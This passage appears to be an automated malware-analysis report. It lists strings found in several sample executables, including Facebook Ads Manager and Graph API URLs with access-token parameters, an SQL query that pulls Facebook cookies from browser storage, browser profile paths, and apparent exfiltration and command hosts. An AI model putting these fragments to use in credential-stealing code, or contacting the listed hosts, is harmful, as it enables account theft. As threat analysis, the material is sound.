1/adsmanager/creation?act=/ads/manager/account_settings/account_billingSec-Fetch-Site: noneAccept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1v7.0/act_Accept: */*Content-type: application/x-www-form-urlencodedSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-sitemanager/account_settings/account_billingprimary_location/infoprofile.phppages/?category=your_pageshttps://www.facebook.com/Error (WinHttpSetOption)Error (WinHttpAddRequestHeaders)vector<T> too longvector<bool> too longalnumalnumalphaalphablankblankcntrlcntrldddigitdigitgraphgraphlowerlowerprintprintpunctpunctspacespacessupperupperwwxdigitxdigitXlG equals www.facebook.com (Facebook)
Source: ubisoftpro.exeString found in binary or memory: http://103.91.21Facebook</title>facebook</title>book.com/pages/?category=your_paall_accounts_tabhttp://qazwsxedcnavigate_from_adSoftware\\TestRele_account_id_cehttps://www.facebook.com/profilebook.com/settinggister\\TestRegiges&ref=bookmarkbook.com/ads/managram.com/accouncompat_iframe_toks/pages?ref_typbook.com/bookmarhttps://www.instadmined_pages":{ equals www.facebook.com (Facebook)
Source: jg2_2qua.exe, 0000001A.00000002.504458828.00000000004F4000.00000040.00020000.sdmpString found in binary or memory: https://www.facebook.com equals www.facebook.com (Facebook)
Source: 002.exeString found in binary or memory: https://www.facebook.com/accountquality/%s/?source=mega_menu&nav_source=flyout_menu&nav_id=1765193856 equals www.facebook.com (Facebook)
Source: 002.exeString found in binary or memory: https://www.facebook.com/ads/manager/account_settings/information/?act=%s&pid=p1&page=account_settings&tab=account_information equals www.facebook.com (Facebook)
Source: 002.exeString found in binary or memory: https://www.facebook.com/ads/manager/accounts/ equals www.facebook.com (Facebook)
Source: hjjgaa.exeString found in binary or memory: https://www.facebook.com/adsmanager/manage/campaigns?act=fb_id equals www.facebook.com (Facebook)
Source: 002.exeString found in binary or memory: https://www.facebook.com/bookmarks/pages?ref_type=logout_gear equals www.facebook.com (Facebook)
Source: 002.exeString found in binary or memory: https://www.facebook.com/pages/?category=your_pages&ref=bookmarks equals www.facebook.com (Facebook)
Source: 002.exeString found in binary or memory: https://www.facebook.com/profile.php equals www.facebook.com (Facebook)
Source: hjjgaa.exeString found in binary or memory: https://www.facebook.com/profile.php?id=c_user&sk=friends equals www.facebook.com (Facebook)
Source: ubisoftpro.exeString found in binary or memory: https://www.facebook.com/settings equals www.facebook.com (Facebook)
Source: 002.exeString found in binary or memory: https://www.facebook.com/settings?tab=notifications equals www.facebook.com (Facebook)
Source: jg2_2qua.exe, 0000001A.00000002.504458828.00000000004F4000.00000040.00020000.sdmpString found in binary or memory: k@Ohttps://www.facebook.comhttp://101.36.107.74/seemorebty/z9Yzbx5JbVSUWmThFFDroiderFDroid1Software\ffdroiderhttps://www.facebook.comwww.facebook.comtext/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36/ads/manager/accountsall_accounts_table_account_id_cellhref="/pages/?category=your_pages&amp;ref=bookmarks?act= equals www.facebook.com (Facebook)
Source: ubisoftpro.exeString found in binary or memory: kK`C:\%x\mshtml.dllIsWow64Processkernel326432%d.%d.%d.%d\MicrosoftEdgeCP\\Application\\c\\Google\\Chrome\\User Data\\Def\\Mozilla\\Firefwww.facebook.comwww.instagram.co\\Mozilla Firefo equals www.facebook.com (Facebook)
Source: jg2_2qua.exe, 0000001A.00000003.480992334.000000000071B000.00000004.00000001.sdmpString found in binary or memory: p]rhttps://www.facebook.comtext/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36en-US,en;q=0.9Keep-Alivei equals www.facebook.com (Facebook)
Source: jg2_2qua.exe, 0000001A.00000003.480028435.0000000000718000.00000004.00000001.sdmpString found in binary or memory: qhttps://www.facebook.comtext/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537 equals www.facebook.com (Facebook)
Source: hjjgaa.exeString found in binary or memory: size: length: capacity: max_size: https://www.facebook.com/login/device-based/login/cookieJsonhttps://www.facebook.com/ads/manager/account_settings/account_billingaccess_token:{accountID:_/v7.0/acthttps://graph.facebook.com/v7.0/act_fb_uid?access_token=fb_access_token&_index=5&_reqName=adaccount&_reqSrc=AdsCMPaymentsAccountDataDispatcher&fields=%5B%22active_billing_date_preference%7Bday_of_month%2Cid%2Cnext_bill_date%2Ctime_created%2Ctime_effective%7D%22%2C%22can_pay_now%22%2C%22can_repay_now%22%2C%22current_unbilled_spend%22%2C%22extended_credit_info%22%2C%22is_br_entity_account%22%2C%22has_extended_credit%22%2C%22max_billing_threshold%22%2C%22min_billing_threshold%22%2C%22min_payment%22%2C%22next_bill_date%22%2C%22pending_billing_date_preference%7Bday_of_month%2Cid%2Cnext_bill_date%2Ctime_created%2Ctime_effective%7D%22%2C%22promotion_progress_bar_info%22%2C%22show_improved_boleto%22%2C%22business%7Bid%2Cname%2Cpayment_account_id%7D%22%2C%22total_prepay_balance%22%2C%22is_in_middle_of_local_entity_migration%22%2C%22is_in_3ds_authorization_enabled_market%22%2C%22current_unpaid_unrepaid_invoice%22%2C%22has_repay_processing_invoices%22%5D&include_headers=false&method=get&pretty=0&suppress_http_code=1un_pwdfb_uidfb_access_tokencan_pay_nowhttps://graph.facebook.com/v7.0/me/adaccounts?access_token=fb_access_token&_reqName=me%2Fadaccounts&_reqSrc=AdsTypeaheadDataManager&fields=%5B%22account_id%22%2C%22account_status%22%2C%22is_direct_deals_enabled%22%2C%22business%7Bid%2Cname%7D%22%2C%22viewable_business%7Bid%2Cname%7D%22%2C%22name%22%5D&filtering=%5B%5D&include_headers=false&limit=100&method=get&pretty=0&sort=name_ascending&suppress_http_code=1"business"dataaccount_ididhttps://business.facebook.com/ads/manager/account_settings/account_billing/?act=fb_account_id&pid=p1&business_id=fb_business_id&page=account_settings&tab=account_billing_settingsfb_account_idfb_business_idhttps://graph.facebook.com/v7.0/act_fb_uid?access_token=fb_access_token&_priority=HIGH&_reqName=adaccount&_reqSrc=AdsCMAccountSpendLimitDataLoader&fields=%5B%22spend_cap%22%2C%22amount_spent%22%5D&include_headers=false&method=get&pretty=0&suppress_http_code=1amount_spenthttps://www.facebook.com/adsmanager/manage/campaigns?act=fb_idfb_id,:{account_currency_ratio_to_usd,adtrust_dslcategory=your_pagestimeline_chromehttps://www.facebook.com/profile.php?id=c_user&sk=friendshref="<>"_gs6""items":{"count"api/fbtime{"sid":0,"time":0,"rand_str":""}api/?sid=sidtimerand_str&key=statusTxG]B equals www.facebook.com (Facebook)
Source: jg2_2qua.exe, 0000001A.00000003.481728424.000000000075E000.00000004.00000001.sdmpString found in binary or memory: uct name,value,encrypted_value from cookies where instr("www.facebook.com", host_key)>0 equals www.facebook.com (Facebook)
Source: jg2_2qua.exe, 0000001A.00000002.504458828.00000000004F4000.00000040.00020000.sdmpString found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: jg2_2qua.exe, 0000001A.00000003.481728424.000000000075E000.00000004.00000001.sdmpString found in binary or memory: www.facebook.com" equals www.facebook.com (Facebook)
Source: jg2_2qua.exe, 0000001A.00000003.481303695.0000000000726000.00000004.00000001.sdmpString found in binary or memory: www.facebook.comg equals www.facebook.com (Facebook)
Source: unknownDNS traffic detected: queries for: g.msn.com
Source: jg2_2qua.exe, 0000001A.00000002.504458828.00000000004F4000.00000040.00020000.sdmpString found in binary or memory: http://101.36.107.74/seemorebty/
Source: jg2_2qua.exe, 0000001A.00000002.503990767.0000000000401000.00000040.00020000.sdmpString found in binary or memory: http://101.36.10https://www.instH
Source: ubisoftpro.exeString found in binary or memory: http://103.91.21Facebook
Source: aliens.exe, 00000013.00000002.508446733.0000000000B6A000.00000004.00000020.sdmpString found in binary or memory: http://7553014BD6A4211B.xyz/
Source: aliens.exe, 00000013.00000002.508446733.0000000000B6A000.00000004.00000020.sdmpString found in binary or memory: http://7553014BD6A4211B.xyz/L
Source: aliens.exe, 00000013.00000002.508492865.0000000000B96000.00000004.00000020.sdmpString found in binary or memory: http://7553014BD6A4211B.xyz/info/w
Source: aliens.exe, 00000013.00000002.508446733.0000000000B6A000.00000004.00000020.sdmpString found in binary or memory: http://7553014BD6A4211B.xyz/ng
Source: aliens.exe, 00000013.00000002.508446733.0000000000B6A000.00000004.00000020.sdmpString found in binary or memory: http://7553014bd6a4211b.xyz/0
Source: aliens.exe, 00000013.00000002.508492865.0000000000B96000.00000004.00000020.sdmp, aliens.exe, 00000013.00000002.508446733.0000000000B6A000.00000004.00000020.sdmpString found in binary or memory: http://7553014bd6a4211b.xyz/info/w
Source: hjjgaa.exeString found in binary or memory: http://Ojyehq4jg.2ihsfa.com/
Source: jg2_2qua.exe, 0000001A.00000003.495900990.0000000003EB9000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: aliens.exe, 00000013.00000002.508576720.0000000000BB7000.00000004.00000020.sdmp, aliens.exe, 00000013.00000002.508666439.0000000000BCF000.00000004.00000020.sdmpString found in binary or memory: http://charlesproxy.com/ssl
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://cookies.onetrust.mgr.consensu.org/?name=euconsent&value=&expire=0&isFirstRequest=true
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://cookies.onetrust.mgr.consensu.org/onetrust-logo.svg
Source: jg2_2qua.exe, 0000001A.00000003.481303695.0000000000726000.00000004.00000001.sdmpString found in binary or memory: http://crl.como
Source: jg2_2qua.exe, 0000001A.00000003.480992334.000000000071B000.00000004.00000001.sdmpString found in binary or memory: http://crl.comoU
Source: jg2_2qua.exe, 0000001A.00000002.506529883.000000000071B000.00000004.00000020.sdmpString found in binary or memory: http://crl.comoZ
Source: jg2_2qua.exe, 0000001A.00000002.506529883.000000000071B000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: aliens.exe, 00000013.00000002.508666439.0000000000BCF000.00000004.00000020.sdmp, jg2_2qua.exe, 0000001A.00000002.506529883.000000000071B000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: hjjgaa.exeString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
Source: aliens.exe, 00000013.00000002.508559285.0000000000BAC000.00000004.00000020.sdmp, jg2_2qua.exe, 0000001A.00000003.495023797.0000000003E31000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: jg2_2qua.exe, 0000001A.00000003.495023797.0000000003E31000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/GTSGIAG3.crl0
Source: jg2_2qua.exe, 0000001A.00000003.495023797.0000000003E31000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: hjjgaa.exeString found in binary or memory: http://crl.sectigo.com/COMODOTimeStampingCA_2.crl0r
Source: Setup.exe, 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp, SibClr.dll.15.drString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: Setup.exe, 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp, SibClr.dll.15.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: 85F91A36E275562F.exe.19.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: jg2_2qua.exe, 0000001A.00000003.495900990.0000000003EB9000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: jg2_2qua.exe, 0000001A.00000003.495377246.0000000003FC0000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: jg2_2qua.exe, 0000001A.00000003.489035024.0000000003DA7000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: jg2_2qua.exe, 0000001A.00000003.495900990.0000000003EB9000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: hjjgaa.exeString found in binary or memory: http://crt.sectigo.com/COMODOTimeStampingCA_2.crt0#
Source: Setup.exe, 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp, SibClr.dll.15.drString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: jg2_2qua.exe, 0000001A.00000002.506529883.000000000071B000.00000004.00000020.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSec
Source: jg2_2qua.exe, 0000001A.00000002.506529883.000000000071B000.00000004.00000020.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSec)
Source: jg2_2qua.exe, 0000001A.00000002.506529883.000000000071B000.00000004.00000020.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: Setup.exe, 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp, SibClr.dll.15.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: 002.exeString found in binary or memory: http://ffdownload.online/business/receive
Source: 002.exeString found in binary or memory: http://ffdownload.online/business/receiveConnection:
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuG4N?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuQtg?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuTly?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuTp7?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuY5J?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuZko?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuqZ9?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADv4Ge?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADv842?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvbPR?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvbce?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvrrg?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyXiwM?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyuliQ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzjSw3?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB16g6qc?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB18T33l?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB18qTPD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19x3nX?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xGDT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xJbM?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xaUu?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yF6n?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yHSm?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yKf2?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19ylKx?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yqHP?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yuvA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yxVU?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB46JmN?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB6Ma4a?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBO5Geh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBVuddh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBWoHwx?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBX2afX?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBi9v6?m=6&o=true&u=true&n=true&w=30&h=30
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBih5H?m=6&o=true&u=true&n=true&w=30&h=30
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBkwUr?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnYSFZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BByBEMv?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: hjjgaa.exeString found in binary or memory: http://ip-api.com/json/countryCodecountry_codemac%s.exeSoftware
Source: Setup.exe, 0000000F.00000000.288312686.0000000000409000.00000002.00020000.sdmp, Setup.exe.0.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: jg2_2qua.exe, 0000001A.00000002.506529883.000000000071B000.00000004.00000020.sdmp, hjjgaa.exeString found in binary or memory: http://ocsp.comodoca.com0
Source: jg2_2qua.exe, 0000001A.00000003.495900990.0000000003EB9000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: jg2_2qua.exe, 0000001A.00000003.495377246.0000000003FC0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
Source: jg2_2qua.exe, 0000001A.00000003.495377246.0000000003FC0000.00000004.00000001.sdmp, jg2_2qua.exe, 0000001A.00000003.489035024.0000000003DA7000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
Source: jg2_2qua.exe, 0000001A.00000003.495023797.0000000003E31000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/GTSGIAG30
Source: jg2_2qua.exe, 0000001A.00000003.495023797.0000000003E31000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gsr202
Source: Setup.exe, 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp, jg2_2qua.exe, 0000001A.00000002.506529883.000000000071B000.00000004.00000020.sdmp, SibClr.dll.15.drString found in binary or memory: http://ocsp.sectigo.com0
Source: 85F91A36E275562F.exe.19.drString found in binary or memory: http://ocsp.thawte.com0
Source: jg2_2qua.exe, 0000001A.00000003.495023797.0000000003E31000.00000004.00000001.sdmpString found in binary or memory: http://pki.goog/gsr2/GTSGIAG3.crt0)
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/2366737e/webcore/externalscripts/oneTrust/ski
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/5445db85/webcore/externalscripts/oneTrust/de-
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
Source: jg2_2qua.exe, 0000001A.00000003.493935204.0000000003F10000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/css/3bf20fde-50425371/directi
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/3bf20fde-2923b6c2/directio
Source: jg2_2qua.exe, 0000001A.00000003.493935204.0000000003F10000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/3bf20fde-b532f4eb/directio
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-2923b6c2/directio
Source: jg2_2qua.exe, 0000001A.00000003.493311716.0000000003D67000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-f8dd99d9/directio
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
Source: jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmp, jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/81/58b810.gif
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/86/2042ed.woff
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuG4N.img?h=75&w=100&
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuQtg.img?h=166&w=310
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuTly.img?h=166&w=310
